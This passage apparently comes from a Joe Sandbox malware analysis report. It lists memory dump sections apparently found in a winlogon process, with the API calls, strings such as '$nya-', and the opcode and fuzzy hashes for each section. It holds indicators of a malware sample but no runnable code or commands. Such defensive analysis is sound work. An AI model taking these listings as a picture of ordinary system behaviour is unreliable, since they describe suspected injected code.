                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 7ae2038be97faaa4bf339515ed2eef7105a8bae153223ddbf86e44b63430d728
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: CB81062C61CE71A6FB50ABED944D36932D1AB96786F54C1A5DA0B87397EB38C841CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 03edbe25b19a16d78846103c908d694f2eede22f677f959411b8934aeaadb500
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 8781082C700F31BAFA519BED954D36962D0AB89787F54C9259A0857FD7EBB8CC41CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 684b0ea4b1d95b88bf2fc3b911224b566bb0b3b7a0efd3eb34d427422fe637d6
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: BC81E82D700E317AFA50EBED944D3A967E1AB9978BF74C1159A09C7397EB38C941CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000003.1989875649.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_3_225dc610000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 9612e62021ed5a6cd12a67d3e1815084ecf9031014c0cf66e27d2e1346f3e915
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 5A81D52C602F71A6FF549BED984D39962D0ABA6783F18C025EE4947796DF38C846CF00
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC649C6B,?,?,?,00000225DC64945C,?,?,?,?,00000225DC648F65), ref: 00000225DC649BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: f95e28dfc33ca7a534d3acc35b749e714b97f789a20428665c6926e110095462
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: BB31083932EF20E1EE11DB8AA8083963398F745BA2F598664DD1F47798EF38C445C300
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC679C6B,?,?,?,00000225DC67945C,?,?,?,?,00000225DC678F65), ref: 00000225DC679BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 276d377e687f46c3aa104caac818f91fda4273325fc345cc73579293a92bb68b
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 4531B639322F60E1EE11DB9A980879623D4FB54FA2F598925DD1D47BD8EF38C445C310
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B31
                                                          • GetLastError.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9B69
                                                          • FreeLibrary.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000225DC6A9C6B,?,?,?,00000225DC6A945C,?,?,?,?,00000225DC6A8F65), ref: 00000225DC6A9BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: cbb0e091a5e8a0647ed17d91b748296e3a1bfd377bedf59ef4bbecbc16baf3ff
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: F131C839322F60A5EF12DB8A980879623D4F754BA2F798525DD1E87794EF38C445C310
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: 2033734ead1eee0760fe514e4fb1f343eab727be6a9dda2dd37494602eb1d2d3
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: CC118239320F6096E7508B9AE85C71A67A1F798FE6F648224EA5E87B94DF38C404C744
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: e1a00947360858de61993c59da533af345ba0edd2cc76b84ab314fa3198168f4
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: BF116329310F5096F750CB9AE858719B6A0FB88FE6F548224EA5E87BD4DF38C804C745
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: eab7698497ab3c3cf8f4afe5226ac72d14a90ac433ca77d2e065e95d4af5d053
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 92119D29310F6096E7618BDAE858719A6B5F798FE6F408224EA5E87B94DF38C804C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: caf8dc8176cc31464ede950ed0476c3e746fbfb24309561ee861608c75650903
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 25D1BC3A208F98D1DA70DB9AE49835A77A0F388B89F504516EACD47BA9DF3DC551CF00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: cb876ffcc14d7cc9c0fe1fa7ca300b15f0f6236db7f881f70835ddb0c2e5d4df
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: C2D19C7A204F9895DA70DB8AE49835AB7B0F788B89F108116EACD877A5DF3DC551CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 849b2c283a368bd6b7d8b5e5c29e36bcfd87e21499934034f9761d219d4f3126
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 99511A3821DF65B5EF06DFECD85869833A1FB0474AF808895A62E073A5EF78D519C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 3468bd196747705ecafc2d2c23a9d117d4093727daae3abfadfed312507525d0
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 8151A539201F65E5EB06DFACDC5829423A1FB08746F948C25A66D0ABE5FF78C559C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: b1319a00c32cb94045c832397be3abdb361cabce2a89a9de64fabfa9db851202
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: 6B51EB3D281F65B5EF06DFACD89829433A1FB04746F948815AA2D867A5FF78C929C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: b35f4ad6ca57cd50bb25f75fbccfe027727c3404bd0641e538bb20a3c2fd2b0d
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: C3318229719F7AA2EA21DF9AE54876977A0FB44F95F18C0309F4A07B55EF34C461C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 0e933dde1ac2161e9d029eb9aafddf3f36767926d58ae12a26d993e46f5d1c6f
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 09318E2A701F75A3EA11DFAAE54876963A0FB44F96F28C8309F4807B95EF38C461C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 662f470960be3b878308010d86b6d609a759a17dc0fb21496952c4ebb4f02033
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: 4A31CE2A701F61A3EA11DF9AE548369A3A1FB54F96F18D0309F4887B65EF38C461C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
